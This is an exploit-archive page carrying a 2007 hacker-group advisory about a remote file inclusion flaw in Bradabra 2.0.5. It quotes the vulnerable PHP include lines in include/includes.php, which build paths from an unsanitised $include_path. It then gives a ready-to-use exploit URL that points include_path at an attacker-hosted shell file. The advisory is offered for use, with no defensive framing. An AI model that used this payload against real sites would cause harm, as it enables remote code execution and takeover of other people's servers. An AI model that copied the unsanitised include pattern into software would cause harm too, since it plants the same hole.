[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Bradabra <= 2.0.5 (include/includes.php) Remote Inclusion Vulnerability
# Published : 2007-01-20
# Author : GoLd_M
# Previous Title : PhpSherpa (include/config.inc.php) Remote File Include Vulnerability
# Next Title : Neon Labs Website <= 3.2 (nl.php g_strRootDir) Remote Inclusion Vuln
======================================================================
Bradabra <== v2.0.5 Remote File Include Vulnerability #
======================================================================
Downlaoad Script :ftp://ftp1.comscripts.com/PHP/773_bradabra-205.gz #
======================================================================
Author: GolD_M = Mahmood_ali && Contact: HackEr_@W.Cn #
======================================================================
SpeciaL GreeTz : Tryag-Team & 4lKaSrGoLd3n-Team #
======================================================================
In: /include/includes.php #
======================================================================
Vulnerable Code: #
======================================================================
include $include_path."config_user.php"; #
include $include_path."defines.php"; #
include $include_path."lang.php"; #
include $include_path."functions.php"; #
include $include_path."functions_arch.php"; #
include $include_path."style.php"; #
include $include_path."sql.php"; #
include $include_path."db_connect.php"; #
include $include_path."db.php"; #
include $include_path."login_check.php"; #
include $include_path."functions_js.php"; #
======================================================================
Exploit: #
======================================================================
http://Victim.Com/include/includes.php?include_path=Shell.txt #
======================================================================
Tryag.Com & Dwrat.com #
======================================================================
# www.Syue.com [2007-01-20]